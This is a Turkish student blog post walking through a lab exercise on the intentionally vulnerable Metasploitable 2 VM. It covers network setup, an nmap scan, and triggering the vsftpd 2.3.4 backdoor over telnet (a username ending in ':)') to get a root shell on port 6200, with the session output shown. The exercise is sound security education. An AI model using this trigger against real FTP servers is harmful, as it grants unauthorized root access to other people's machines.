12 Ekim 2016 Çarşamba

Metasploitable 2

Servisler : Backdoors (Arka Kapılar)

Bu yazımda kurulumunu anlattığım Metasploitable 2'nin, 21.portunda çalışan FTP sunucusunun
vsftpd programı ile ilgili bir şeyler karalayacağım.

Öncelikle Metasploitable2'ye login oluyoruz. Bize zaten Kullanıcı adı ve Parolamızı hatırlatıyor. :)















Daha sonra 

$ ifconfig komutu ile makinenin IP alıp almadığını kontrol ediyorum.















Kendi makinem ile aynı ağda olmasını istediğim için öncelikle kendi makinemdeki terminale gelerek:

$ ifconfig komutunu yazıyorum.
Ve vboxnet0'n IP adresinin 192.168.56.1 olduğunu görüyorum. Şimdi bende Metasploitable 2'yi kendi makinem ile aynı ağda olacak şekilde bir IP adresi atıyorum. 

Bunları yapabilmek için öncelikle süper kullanıcı(root) olmam gerek. Çünkü ifconfig komutu /sbin/ifconfig/ dizini altında bulunuyor ve /sbin/  dizininde normal kullanıcı iken ya da root iken işler farklı ilerliyor. Yapılandırma yapabilmek için root olmam gerekiyor.

# ifconfig eth0 192.168.56.42 netmask 255.255.255.0 up komutunu yazıyorum.

Sadece IP adresi atamam yetmiyor. Bir Yönlendirici adreside atamam gerek. Bunun için de:

# route add default gw 192.168.56.1 komutunu yazıyorum.







Daha sonra benim makinemle haberleşebiliyor muyum diye ping atıyorum yani bir ICMP paketi gönderiyorum.




















Sıra geldi kendi makinemde nmap ile tarama yaparak Metasploitable 2'nin portlarını ve o portlarda açık olan servisleri görmeye, kendi makinemin konsolunu açarak:

$ nmap 192.168.56.0/24 yazıyorum.

















 192.168.56.1 IP adresli kendi makinemi ve 192.168.56.42 IP adresli Metasploitable 2'ı gördü.
Şimdi kendi makinemde root olarak Telnet ile Metasploitable 2'de oturum açacağım.
Öncelikle Telnet Nedir dersek , bir makineye uzaktaki başka bir makineden bağlanmak için geliştirilen bir TCP/IP protokolü ve bu işi yapan programlara verilen isimdir.(vikipedi :) )

Telnet ile bir şeyler yapabilmek için kendi makinemde root oluyorum.

# telnet 192.168.56.42 21 (Metasploitable 2'nin 21.portunda çalışan serviste oturum açmaya çalışıyorum.)

Trying 192.168.56.42...
Connected to 192.168.56.42.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass invalid
^]
telnet> quit
Connection closed.

Burada koyu yazılanları biz yazıyoruz. Dipnot : Benim ilk denediğimde olmadı. Terminali kapattım ve yeniden açarak root olduktan sonra aynı komutu yazdım, bu sefer düzeldi.
Bu işlemi yaptığımızda karşı makinede yani Metasploitable 2'de 6200.port aktif hale geliyor. Başta taradığımızda sadece 6000. ve 6667.portlar açıktı.

# telnet 192.168.56.42 6200

       Trying 192.168.56.42...
Connected to 192.168.56.42.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)

Burada koyu yazılmış olan id; 'yi biz yazıyoruz. Ve görüldüğü gibi karşı taraftaki makinede yani Metasploitable 2'de root olarak, oturum açmış bulunmaktayız. :))

Bu işi daha iyi anlamak ve özümsemek için bu sayfaya bakabilirsiniz. Bilgisayar Ağları dersinden bugünlük bu kadar ile yetindik, umarım faydalı oluyordur. :))
Kolaylıklar diliyorum. :)
Gönderen zaman:
Etiketler: , , , ,

1 yorum:

  1. Unknown5 Eylül 2018 16:23

    Yorumunuzu yeni görüyorum, özür dilerim. https://hackerkitty.wordpress.com/2014/10/24/install-ftp-server-on-kali-linux/ Bu linkte olduğu gibi mi adımları takip etmiştiniz ? Mail yolu ile daha çok yardımcı olabilirim dilekuzulmez@gmail.com

    YanıtlaSil

Kaydol: Kayıt Yorumları (Atom)